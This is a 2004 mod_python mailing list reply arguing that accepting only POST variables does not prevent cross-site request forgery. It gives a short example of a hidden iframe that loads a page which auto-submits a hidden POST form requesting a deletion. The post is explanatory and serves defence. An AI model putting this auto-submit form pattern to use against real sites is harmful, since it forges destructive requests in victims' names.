[mod_python] Questions on _call_ with mp servlets and python

mike bayer mike_mp at zzzcomputing.com
Fri Sep 3 17:26:39 EDT 2004


> On Friday 03 September 2004 20:35, David Fraser wrote:
>
>
> If you don't use the query string parameters when you are expecting POST
> variables, then your users are not susceptible to this form of attack.


sadly, not true:

<IFRAME width="0" height="0" src="myattack.html"></IFRAME>

myattack.html:

<body onload = "myform.submit()">
<form name="myform" method="POST" action="http://www.example.com/script">
<input type="hidden" name="deletesomething" value="true">
</form>
</body>


More information about the Mod_python mailing list